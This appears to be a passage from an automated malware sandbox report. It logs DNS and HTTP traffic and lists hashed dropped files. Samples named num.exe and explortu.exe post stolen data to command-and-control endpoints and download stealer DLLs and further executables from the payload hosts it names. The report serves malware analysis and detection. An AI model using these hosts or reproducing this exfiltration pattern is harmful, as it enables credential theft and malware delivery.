                          cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgZg%3D%3D
                          cookie: OTZ=7616690_56_56__56_
                        • flag-us
                          DNS
                          99.201.58.216.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          99.201.58.216.in-addr.arpa
                          IN PTR
                          Response
                          99.201.58.216.in-addr.arpa
                          IN PTR
                          prg03s02-in-f991e100net
                          99.201.58.216.in-addr.arpa
                          IN PTR
                          lhr48s48-in-f3�H
                          99.201.58.216.in-addr.arpa
                          IN PTR
                          prg03s02-in-f3�H
                        • flag-us
                          DNS
                          4.47.28.85.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          4.47.28.85.in-addr.arpa
                          IN PTR
                          Response
                        • flag-us
                          DNS
                          beacons.gcp.gvt2.com
                          Remote address:
                          8.8.8.8:53
                          Request
                          beacons.gcp.gvt2.com
                          IN A
                          Response
                          beacons.gcp.gvt2.com
                          IN CNAME
                          beacons-handoff.gcp.gvt2.com
                          beacons-handoff.gcp.gvt2.com
                          IN A
                          172.217.169.67
                        • flag-us
                          DNS
                          self.events.data.microsoft.com
                          Remote address:
                          8.8.8.8:53
                          Request
                          self.events.data.microsoft.com
                          IN A
                          Response
                          self.events.data.microsoft.com
                          IN CNAME
                          self-events-data.trafficmanager.net
                          self-events-data.trafficmanager.net
                          IN CNAME
                          onedscolprdwus05.westus.cloudapp.azure.com
                          onedscolprdwus05.westus.cloudapp.azure.com
                          IN A
                          20.189.173.6
                        • flag-ru
                          POST
                          http://85.28.47.4/920475a59bac849d.php
                          num.exe
                          Remote address:
                          85.28.47.4:80
                          Request
                          POST /920475a59bac849d.php HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----EGDGDHJJDGHCAAAKEHIJ
                          Host: 85.28.47.4
                          Content-Length: 214
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Response
                          HTTP/1.1 200 OK
                          Date: Tue, 25 Jun 2024 08:50:28 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Vary: Accept-Encoding
                          Content-Length: 156
                          Keep-Alive: timeout=5, max=100
                          Connection: Keep-Alive
                          Content-Type: text/html; charset=UTF-8
                        • flag-ru
                          POST
                          http://85.28.47.4/920475a59bac849d.php
                          num.exe
                          Remote address:
                          85.28.47.4:80
                          Request
                          POST /920475a59bac849d.php HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----DBFIDGIIIJDBGDGDAKKF
                          Host: 85.28.47.4
                          Content-Length: 268
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Response
                          HTTP/1.1 200 OK
                          Date: Tue, 25 Jun 2024 08:50:28 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Vary: Accept-Encoding
                          Content-Length: 1520
                          Keep-Alive: timeout=5, max=99
                          Connection: Keep-Alive
                          Content-Type: text/html; charset=UTF-8
                        • flag-ru
                          POST
                          http://85.28.47.4/920475a59bac849d.php
                          num.exe
                          Remote address:
                          85.28.47.4:80
                          Request
                          POST /920475a59bac849d.php HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----EBFBKKJECAKEHJJJDBAF
                          Host: 85.28.47.4
                          Content-Length: 267
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Response
                          HTTP/1.1 200 OK
                          Date: Tue, 25 Jun 2024 08:50:28 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Vary: Accept-Encoding
                          Content-Length: 5416
                          Keep-Alive: timeout=5, max=98
                          Connection: Keep-Alive
                          Content-Type: text/html; charset=UTF-8
                        • flag-ru
                          POST
                          http://85.28.47.4/920475a59bac849d.php
                          num.exe
                          Remote address:
                          85.28.47.4:80
                          Request
                          POST /920475a59bac849d.php HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----CAEBGHDBKEBGIDHJJEHC
                          Host: 85.28.47.4
                          Content-Length: 268
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Response
                          HTTP/1.1 200 OK
                          Date: Tue, 25 Jun 2024 08:50:28 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Vary: Accept-Encoding
                          Content-Length: 108
                          Keep-Alive: timeout=5, max=97
                          Connection: Keep-Alive
                          Content-Type: text/html; charset=UTF-8
                        • flag-ru
                          POST
                          http://85.28.47.4/920475a59bac849d.php
                          num.exe
                          Remote address:
                          85.28.47.4:80
                          Request
                          POST /920475a59bac849d.php HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----IIJEBFCFIJJJEBGDBAKE
                          Host: 85.28.47.4
                          Content-Length: 4815
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Response
                          HTTP/1.1 200 OK
                          Date: Tue, 25 Jun 2024 08:50:28 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 0
                          Keep-Alive: timeout=5, max=96
                          Connection: Keep-Alive
                          Content-Type: text/html; charset=UTF-8
                        • flag-ru
                          GET
                          http://85.28.47.4/69934896f997d5bb/sqlite3.dll
                          num.exe
                          Remote address:
                          85.28.47.4:80
                          Request
                          GET /69934896f997d5bb/sqlite3.dll HTTP/1.1
                          Host: 85.28.47.4
                          Cache-Control: no-cache
                          Response
                          HTTP/1.1 200 OK
                          Date: Tue, 25 Jun 2024 08:50:29 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Last-Modified: Mon, 05 Sep 2022 14:30:30 GMT
                          ETag: "10e436-5e7eeebed8d80"
                          Accept-Ranges: bytes
                          Content-Length: 1106998
                          Content-Type: application/x-msdos-program
                        • flag-ru
                          POST
                          http://85.28.47.4/920475a59bac849d.php
                          num.exe
                          Remote address:
                          85.28.47.4:80
                          Request
                          POST /920475a59bac849d.php HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----GCGHJEBGHJKEBFHIJDHC
                          Host: 85.28.47.4
                          Content-Length: 675
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Response
                          HTTP/1.1 200 OK
                          Date: Tue, 25 Jun 2024 08:50:29 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 0
                          Keep-Alive: timeout=5, max=94
                          Connection: Keep-Alive
                          Content-Type: text/html; charset=UTF-8
                        • flag-ru
                          POST
                          http://85.28.47.4/920475a59bac849d.php
                          num.exe
                          Remote address:
                          85.28.47.4:80
                          Request
                          POST /920475a59bac849d.php HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----ECFCBFBGDBKJKECAAKKF
                          Host: 85.28.47.4
                          Content-Length: 359
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Response
                          HTTP/1.1 200 OK
                          Date: Tue, 25 Jun 2024 08:50:30 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 0
                          Keep-Alive: timeout=5, max=93
                          Connection: Keep-Alive
                          Content-Type: text/html; charset=UTF-8
                        • flag-ru
                          POST
                          http://85.28.47.4/920475a59bac849d.php
                          num.exe
                          Remote address:
                          85.28.47.4:80
                          Request
                          POST /920475a59bac849d.php HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----CFCBFBGDBKJKECAAKKFH
                          Host: 85.28.47.4
                          Content-Length: 359
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Response
                          HTTP/1.1 200 OK
                          Date: Tue, 25 Jun 2024 08:50:30 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 0
                          Keep-Alive: timeout=5, max=92
                          Connection: Keep-Alive
                          Content-Type: text/html; charset=UTF-8
                        • flag-ru
                          GET
                          http://85.28.47.4/69934896f997d5bb/freebl3.dll
                          num.exe
                          Remote address:
                          85.28.47.4:80
                          Request
                          GET /69934896f997d5bb/freebl3.dll HTTP/1.1
                          Host: 85.28.47.4
                          Cache-Control: no-cache
                          Response
                          HTTP/1.1 200 OK
                          Date: Tue, 25 Jun 2024 08:50:31 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                          ETag: "a7550-5e7ebd4425100"
                          Accept-Ranges: bytes
                          Content-Length: 685392
                          Content-Type: application/x-msdos-program
                        • flag-ru
                          GET
                          http://85.28.47.4/69934896f997d5bb/mozglue.dll
                          num.exe
                          Remote address:
                          85.28.47.4:80
                          Request
                          GET /69934896f997d5bb/mozglue.dll HTTP/1.1
                          Host: 85.28.47.4
                          Cache-Control: no-cache
                          Response
                          HTTP/1.1 200 OK
                          Date: Tue, 25 Jun 2024 08:50:31 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                          ETag: "94750-5e7ebd4425100"
                          Accept-Ranges: bytes
                          Content-Length: 608080
                          Content-Type: application/x-msdos-program
                        • flag-ru
                          GET
                          http://85.28.47.4/69934896f997d5bb/msvcp140.dll
                          num.exe
                          Remote address:
                          85.28.47.4:80
                          Request
                          GET /69934896f997d5bb/msvcp140.dll HTTP/1.1
                          Host: 85.28.47.4
                          Cache-Control: no-cache
                          Response
                          HTTP/1.1 200 OK
                          Date: Tue, 25 Jun 2024 08:50:32 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                          ETag: "6dde8-5e7ebd4425100"
                          Accept-Ranges: bytes
                          Content-Length: 450024
                          Content-Type: application/x-msdos-program
                        • flag-ru
                          GET
                          http://85.28.47.4/69934896f997d5bb/nss3.dll
                          num.exe
                          Remote address:
                          85.28.47.4:80
                          Request
                          GET /69934896f997d5bb/nss3.dll HTTP/1.1
                          Host: 85.28.47.4
                          Cache-Control: no-cache
                          Response
                          HTTP/1.1 200 OK
                          Date: Tue, 25 Jun 2024 08:50:32 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                          ETag: "1f3950-5e7ebd4425100"
                          Accept-Ranges: bytes
                          Content-Length: 2046288
                          Content-Type: application/x-msdos-program
                        • flag-ru
                          GET
                          http://85.28.47.4/69934896f997d5bb/softokn3.dll
                          num.exe
                          Remote address:
                          85.28.47.4:80
                          Request
                          GET /69934896f997d5bb/softokn3.dll HTTP/1.1
                          Host: 85.28.47.4
                          Cache-Control: no-cache
                          Response
                          HTTP/1.1 200 OK
                          Date: Tue, 25 Jun 2024 08:50:33 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                          ETag: "3ef50-5e7ebd4425100"
                          Accept-Ranges: bytes
                          Content-Length: 257872
                          Content-Type: application/x-msdos-program
                        • flag-ru
                          GET
                          http://85.28.47.4/69934896f997d5bb/vcruntime140.dll
                          num.exe
                          Remote address:
                          85.28.47.4:80
                          Request
                          GET /69934896f997d5bb/vcruntime140.dll HTTP/1.1
                          Host: 85.28.47.4
                          Cache-Control: no-cache
                          Response
                          HTTP/1.1 200 OK
                          Date: Tue, 25 Jun 2024 08:50:33 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                          ETag: "13bf0-5e7ebd4425100"
                          Accept-Ranges: bytes
                          Content-Length: 80880
                          Content-Type: application/x-msdos-program
                        • flag-ru
                          POST
                          http://85.28.47.4/920475a59bac849d.php
                          num.exe
                          Remote address:
                          85.28.47.4:80
                          Request
                          POST /920475a59bac849d.php HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----DAFCAAEGDBKJJKECBKFH
                          Host: 85.28.47.4
                          Content-Length: 947
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Response
                          HTTP/1.1 200 OK
                          Date: Tue, 25 Jun 2024 08:50:33 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 0
                          Keep-Alive: timeout=5, max=85
                          Connection: Keep-Alive
                          Content-Type: text/html; charset=UTF-8
                        • flag-ru
                          POST
                          http://85.28.47.4/920475a59bac849d.php
                          num.exe
                          Remote address:
                          85.28.47.4:80
                          Request
                          POST /920475a59bac849d.php HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----IDHIEBAAKJDHIECAAFHC
                          Host: 85.28.47.4
                          Content-Length: 267
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Response
                          HTTP/1.1 200 OK
                          Date: Tue, 25 Jun 2024 08:50:33 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Vary: Accept-Encoding
                          Content-Length: 2408
                          Keep-Alive: timeout=5, max=84
                          Connection: Keep-Alive
                          Content-Type: text/html; charset=UTF-8
                        • flag-ru
                          POST
                          http://85.28.47.4/920475a59bac849d.php
                          num.exe
                          Remote address:
                          85.28.47.4:80
                          Request
                          POST /920475a59bac849d.php HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----KKFCFBKFCFBFIDGCGDHJ
                          Host: 85.28.47.4
                          Content-Length: 265
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Response
                          HTTP/1.1 200 OK
                          Date: Tue, 25 Jun 2024 08:50:33 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 0
                          Keep-Alive: timeout=5, max=83
                          Connection: Keep-Alive
                          Content-Type: text/html; charset=UTF-8
                        • flag-ru
                          POST
                          http://85.28.47.4/920475a59bac849d.php
                          num.exe
                          Remote address:
                          85.28.47.4:80
                          Request
                          POST /920475a59bac849d.php HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----FHIEBKKFHIEGCAKECGHJ
                          Host: 85.28.47.4
                          Content-Length: 363
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Response
                          HTTP/1.1 200 OK
                          Date: Tue, 25 Jun 2024 08:50:33 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 0
                          Keep-Alive: timeout=5, max=82
                          Connection: Keep-Alive
                          Content-Type: text/html; charset=UTF-8
                        • flag-ru
                          POST
                          http://85.28.47.4/920475a59bac849d.php
                          num.exe
                          Remote address:
                          85.28.47.4:80
                          Request
                          POST /920475a59bac849d.php HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----GCGCBAECFCAKKEBFCFII
                          Host: 85.28.47.4
                          Content-Length: 270
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Response
                          HTTP/1.1 200 OK
                          Date: Tue, 25 Jun 2024 08:50:34 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 0
                          Keep-Alive: timeout=5, max=81
                          Connection: Keep-Alive
                          Content-Type: text/html; charset=UTF-8
                        • flag-gb
                          POST
                          https://beacons.gcp.gvt2.com/domainreliability/upload
                          chrome.exe
                          Remote address:
                          172.217.169.67:443
                          Request
                          POST /domainreliability/upload HTTP/2.0
                          host: beacons.gcp.gvt2.com
                          content-length: 568
                          content-type: application/json; charset=utf-8
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                          accept-encoding: gzip, deflate, br
                          accept-language: en-US,en;q=0.9
                        • 147.45.47.155:80
                          http://147.45.47.155/ku4Nor9/index.php
                          http
                          explortu.exe
                          2.0kB
                          2.0kB
                          18
                          12

                          HTTP Request

                          POST http://147.45.47.155/ku4Nor9/index.php

                          HTTP Response

                          200

                          HTTP Request

                          POST http://147.45.47.155/ku4Nor9/index.php

                          HTTP Response

                          200

                          HTTP Request

                          POST http://147.45.47.155/ku4Nor9/index.php

                          HTTP Response

                          200

                          HTTP Request

                          POST http://147.45.47.155/ku4Nor9/index.php

                          HTTP Response

                          200

                          HTTP Request

                          POST http://147.45.47.155/ku4Nor9/index.php

                          HTTP Response

                          200

                          HTTP Request

                          POST http://147.45.47.155/ku4Nor9/index.php

                          HTTP Response

                          200
                        • 77.91.77.81:80
                          http://77.91.77.81/cost/num.exe
                          http
                          explortu.exe
                          337.9kB
                          10.2MB
                          7280
                          7277

                          HTTP Request

                          GET http://77.91.77.81/cost/sarra.exe

                          HTTP Response

                          200

                          HTTP Request

                          GET http://77.91.77.81/cost/random.exe

                          HTTP Response

                          200

                          HTTP Request

                          GET http://77.91.77.81/well/random.exe

                          HTTP Response

                          200

                          HTTP Request

                          GET http://77.91.77.81/cost/num.exe

                          HTTP Response

                          200
                        • 216.58.204.78:443
                          https://www.youtube.com/account
                          tls, http2
                          chrome.exe
                          2.1kB
                          10.6kB
                          15
                          19

                          HTTP Request

                          GET https://www.youtube.com/account
                        • 216.58.204.78:443
                          www.youtube.com
                          tls, http2
                          chrome.exe
                          1.0kB
                          8.2kB
                          10
                          10
                        • 216.58.212.206:443
                          https://consent.youtube.com/_/ConsentUi/browserinfo?f.sid=8961433167468703326&bl=boq_identityfrontenduiserver_20240617.06_p0&hl=en&gl=GB&_reqid=31832&rt=j
                          tls, http2
                          chrome.exe
                          4.2kB
                          62.9kB
                          45
                          61

                          HTTP Request

                          GET https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3Fcbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1

                          HTTP Request

                          POST https://consent.youtube.com/_/ConsentUi/browserinfo?f.sid=8961433167468703326&bl=boq_identityfrontenduiserver_20240617.06_p0&hl=en&gl=GB&_reqid=31832&rt=j
                        • 142.250.187.196:443
                          www.google.com
                          tls
                          chrome.exe
                          953 B
                          4.6kB
                          8
                          9
                        • 85.28.47.4:80
                          http://85.28.47.4/920475a59bac849d.php
                          http
                          num.exe
                          196.4kB
                          5.4MB
                          3914
                          3901

                          HTTP Request

                          POST http://85.28.47.4/920475a59bac849d.php

                          HTTP Response

                          200

                          HTTP Request

                          POST http://85.28.47.4/920475a59bac849d.php

                          HTTP Response

                          200

                          HTTP Request

                          POST http://85.28.47.4/920475a59bac849d.php

                          HTTP Response

                          200

                          HTTP Request

                          POST http://85.28.47.4/920475a59bac849d.php

                          HTTP Response

                          200

                          HTTP Request

                          POST http://85.28.47.4/920475a59bac849d.php

                          HTTP Response

                          200

                          HTTP Request

                          GET http://85.28.47.4/69934896f997d5bb/sqlite3.dll

                          HTTP Response

                          200

                          HTTP Request

                          POST http://85.28.47.4/920475a59bac849d.php

                          HTTP Response

                          200

                          HTTP Request

                          POST http://85.28.47.4/920475a59bac849d.php

                          HTTP Response

                          200

                          HTTP Request

                          POST http://85.28.47.4/920475a59bac849d.php

                          HTTP Response

                          200

                          HTTP Request

                          GET http://85.28.47.4/69934896f997d5bb/freebl3.dll

                          HTTP Response

                          200

                          HTTP Request

                          GET http://85.28.47.4/69934896f997d5bb/mozglue.dll

                          HTTP Response

                          200

                          HTTP Request

                          GET http://85.28.47.4/69934896f997d5bb/msvcp140.dll

                          HTTP Response

                          200

                          HTTP Request

                          GET http://85.28.47.4/69934896f997d5bb/nss3.dll

                          HTTP Response

                          200

                          HTTP Request

                          GET http://85.28.47.4/69934896f997d5bb/softokn3.dll

                          HTTP Response

                          200

                          HTTP Request

                          GET http://85.28.47.4/69934896f997d5bb/vcruntime140.dll

                          HTTP Response

                          200

                          HTTP Request

                          POST http://85.28.47.4/920475a59bac849d.php

                          HTTP Response

                          200

                          HTTP Request

                          POST http://85.28.47.4/920475a59bac849d.php

                          HTTP Response

                          200

                          HTTP Request

                          POST http://85.28.47.4/920475a59bac849d.php

                          HTTP Response

                          200

                          HTTP Request

                          POST http://85.28.47.4/920475a59bac849d.php

                          HTTP Response

                          200

                          HTTP Request

                          POST http://85.28.47.4/920475a59bac849d.php

                          HTTP Response

                          200
                        • 142.250.187.238:443
                          clients2.google.com
                          tls, http2
                          chrome.exe
                          1.1kB
                          8.2kB
                          11
                          11
                        • 172.217.169.46:443
                          play.google.com
                          tls, http2
                          chrome.exe
                          1.0kB
                          7.7kB
                          10
                          10
                        • 172.217.169.67:443
                          https://beacons.gcp.gvt2.com/domainreliability/upload
                          tls, http2
                          chrome.exe
                          2.3kB
                          6.9kB
                          15
                          16

                          HTTP Request

                          POST https://beacons.gcp.gvt2.com/domainreliability/upload
                        • 8.8.8.8:53
                          81.77.91.77.in-addr.arpa
                          dns
                          686 B
                          1.3kB
                          10
                          10

                          DNS Request

                          81.77.91.77.in-addr.arpa

                          DNS Request

                          8.8.8.8.in-addr.arpa

                          DNS Request

                          www.googleapis.com

                          DNS Response

                          142.250.187.234
                          142.250.187.202
                          142.250.200.42
                          172.217.169.74
                          142.250.179.234
                          172.217.16.234
                          172.217.169.42
                          142.250.178.10
                          216.58.204.74
                          216.58.201.106
                          142.250.180.10
                          216.58.212.234
                          172.217.169.10
                          142.250.200.10

                          DNS Request

                          234.187.250.142.in-addr.arpa

                          DNS Request

                          consent.youtube.com

                          DNS Response

                          216.58.212.206

                          DNS Request

                          fonts.gstatic.com

                          DNS Response

                          216.58.201.99

                          DNS Request

                          195.212.58.216.in-addr.arpa

                          DNS Request

                          196.187.250.142.in-addr.arpa

                          DNS Request

                          play.google.com

                          DNS Response

                          172.217.169.46

                          DNS Request

                          nexusrules.officeapps.live.com

                          DNS Response

                          52.111.236.22

                        • 8.8.8.8:53
                          155.47.45.147.in-addr.arpa
                          dns
                          608 B
                          1.3kB
                          9
                          9

                          DNS Request

                          155.47.45.147.in-addr.arpa

                          DNS Request

                          www.youtube.com

                          DNS Response

                          216.58.204.78
                          216.58.212.238
                          142.250.180.14
                          142.250.178.14
                          142.250.200.14
                          172.217.16.238
                          142.250.200.46
                          216.58.212.206
                          142.250.187.238
                          216.58.201.110
                          172.217.169.46
                          142.250.187.206
                          142.250.179.238

                          DNS Request

                          78.204.58.216.in-addr.arpa

                          DNS Request

                          www.gstatic.com

                          DNS Response

                          216.58.212.195

                          DNS Request

                          www.google.com

                          DNS Response

                          142.250.187.196

                          DNS Request

                          74.204.58.216.in-addr.arpa

                          DNS Request

                          clients2.google.com

                          DNS Response

                          142.250.187.238

                          DNS Request

                          46.169.217.172.in-addr.arpa

                          DNS Request

                          22.236.111.52.in-addr.arpa

                        • 142.250.187.196:443
                          www.google.com
                          https
                          chrome.exe
                          3.9kB
                          9.3kB
                          10
                          11
                        • 8.8.8.8:53
                          99.201.58.216.in-addr.arpa
                          dns
                          283 B
                          604 B
                          4
                          4

                          DNS Request

                          99.201.58.216.in-addr.arpa

                          DNS Request

                          4.47.28.85.in-addr.arpa

                          DNS Request

                          beacons.gcp.gvt2.com

                          DNS Response

                          172.217.169.67

                          DNS Request

                          self.events.data.microsoft.com

                          DNS Response

                          20.189.173.6

                        • 142.250.187.238:443
                          clients2.google.com
                          https
                          chrome.exe
                          2.5kB
                          8.1kB
                          9
                          12
                        • 224.0.0.251:5353
                          chrome.exe
                          204 B
                          3
                        • 216.58.212.206:443
                          www.youtube.com
                          https
                          chrome.exe
                          2.9kB
                          7.2kB
                          5
                          8
                        • 172.217.169.46:443
                          www.youtube.com
                          https
                          chrome.exe
                          3.5kB
                          7.1kB
                          10
                          11
                        • 172.217.169.46:443
                          www.youtube.com
                          https
                          chrome.exe
                          4.9kB
                          7.7kB
                          10
                          12
                        • 216.58.212.206:443
                          www.youtube.com
                          https
                          chrome.exe
                          2.8kB
                          3.7kB
                          8
                          10

                        MITRE ATT&CK Enterprise v15

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • C:\ProgramData\mozglue.dll

                          Filesize

                          593KB

                          MD5

                          c8fd9be83bc728cc04beffafc2907fe9

                          SHA1

                          95ab9f701e0024cedfbd312bcfe4e726744c4f2e

                          SHA256

                          ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

                          SHA512

                          fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

                        • C:\ProgramData\nss3.dll

                          Filesize

                          2.0MB

                          MD5

                          1cc453cdf74f31e4d913ff9c10acdde2

                          SHA1

                          6e85eae544d6e965f15fa5c39700fa7202f3aafe

                          SHA256

                          ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

                          SHA512

                          dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                          Filesize

                          216B

                          MD5

                          759835b5e4f154613d7c35159fef1d78

                          SHA1

                          0a20a10d9c3ad88b9d292eb131e2503eccffb529

                          SHA256

                          4044136b913f6b7f47fc5275f1e54ecca692a377b3e5f581994f3d1af524a456

                          SHA512

                          167f4225b9ca00581e68956b858a25d202ff873d9ca3a012e97373c1e4827c654b432f035bf49579546356beb110d6b5df6b8fb2e135dac432d6984ab38d955f

                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                          Filesize

                          2KB

                          MD5

                          9822dab7e9ea478d852e32f3be90c5ff

                          SHA1

                          e0bcec7c807e2c8369c6f977e518615e3733d8d8

                          SHA256

                          8cf7876c57b4c5896872d6d7cc68e6b7a8e30bd27bdd4271d0a9a9fd246aba24

                          SHA512

                          175efae3fda01e3bd4b38467b50ad0c8ef73718159ee4c11c59a8e3e1462d03cfdcf7be5eef15e8addeb27f35829dcecf24f780c30244f675d8b9d1fb6ad1196

                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                          Filesize

                          2KB

                          MD5

                          f5dbf8cbaa255aab06472945dd342419

                          SHA1

                          d6db708f22311e3811f6085de6c1eaa10ef5aeb1

                          SHA256

                          906f395ec821091a5b3c06166eb90d6d04ba3e85702aa13b24937b11e31c3213

                          SHA512

                          32b6838340e6bddca55b13440978e46194dc5ad9de1af67898a5828c667cc3e6f7439914e48ab1cbc304b14ed891f275cd4292511ece8df36672a5ba84deb09e

                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                          Filesize

                          2B

                          MD5

                          d751713988987e9331980363e24189ce

                          SHA1

                          97d170e1550eee4afc0af065b78cda302a97674c

                          SHA256

                          4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                          SHA512

                          b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                          Filesize

                          692B

                          MD5

                          cc50257ffa6729876256eeed9dd77fac

                          SHA1

                          1f1000084b8bbc5454b90fcea94a8b220a23a682

                          SHA256

                          e6fd47a82ab68e12a0c9e0222df24279c71058305dd81ee4e724a5ac2778da1b

                          SHA512

                          16cd00f2d3d94df4217bbda232cc7da28b2f789973f4f2df5f48755e812737538eab99d6a841c4800a139268018b97fac742a53d4aeadb66ae4f5e0a2a3a9d6b

                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                          Filesize

                          7KB

                          MD5

                          8edc8875a95273382e60f4bc55035d00

                          SHA1

                          2a6ffdc666e7eceb0b3f94370d5b3a156c913ac5

                          SHA256

                          9f3a22113340ee0cf9e9d38850a1328a611f03066991c8ce7b36481a712f028d

                          SHA512

                          05ce83c820bb8eb69413ae5c5d729d9b5a856fc83ebdfc3cfbc8ac46902123fc9fed227bac391b45f2c2f77af4f72838f06c1ea9aa3c2735513b504a1a66da3c

                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

                          Filesize

                          16KB

                          MD5

                          56dc89a7f221fdb2fed0cef12e4f2781

                          SHA1

                          5712a22f1176da7fcda5cc6294f8ade16858be55

                          SHA256

                          ccc4ea146dafcac5e8d5f3131ceafbea4c7762a84c4d6e12d275a4bb026541f4

                          SHA512

                          a4b6d82a5aa77799b4488ea82fc3e4121832930fd588e03cffe84d841121ea2317a4bfd550dcbd4cbb80d54024d9dc4c9cd3ba63292048ad176926b94e583e03

                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                          Filesize

                          281KB

                          MD5

                          17f9169c7e7efe95bf599a6b02e07fa4

                          SHA1

                          c35151e8e953267e73b0e66263d4cd3786cdcd0e

                          SHA256

                          ac92504fa64cb77f82dce0925429a5fb491639168ca62f9cf124bc895e948efb

                          SHA512

                          fa76de9d3e0fb993cf9e3cad0ebd11887246cea51f3d55d03e3ecfa09878f9e3e5f31b408f6959faaf2ad757b8266c1278c3281a5a01233bb27ea7482cf85edb

                        • C:\Users\Admin\AppData\Local\Temp\1000016001\222be12d3f.exe

                          Filesize

                          2.4MB

                          MD5

                          bdc88ebff2c97c43a231763acc85fce5

                          SHA1

                          773969dbc2a235a04dfdf951b56d86a98d629409

                          SHA256

                          740fa213c3d59c6f0d33a0020a901d1fd9e50f6746438ad02b2d8c66b083c739

                          SHA512

                          a1344b83a3620ffc42382ea47199a96c97e0589b2d3791517f593bbc6c25b452954a88a32521e8244ffa57e49c4aeb174963db4f1c6fa6a19f88b0a461dd056e

                        • C:\Users\Admin\AppData\Local\Temp\1000017001\41c790c7b2.exe

                          Filesize

                          2.3MB

                          MD5

                          4ac315900ef59fdca54013ad4e9cdd8a

                          SHA1

                          4f57bcad4435e12626ef4dde276f964bd1b372cc

                          SHA256

                          0fce9a56a8ce16de9420fb67e2bcfbabaef83a36178293383a36c9f9843e0f41

                          SHA512

                          ed5db011dc71a2d84adf88740b5efa96ab77bb87e67e1f300491ca36536d55c7376367ac2c0111bf2bc7fae65bd375182fc7faa2d4ea2f9c22a87157f0bd2fbc

                        • C:\Users\Admin\AppData\Local\Temp\1000020001\num.exe

                          Filesize

                          2.4MB

                          MD5

                          26a77a61fb964d82c815da952ebedb23

                          SHA1

                          8d9100fcc2e55df7c20954d459c1a6c5861228a1

                          SHA256

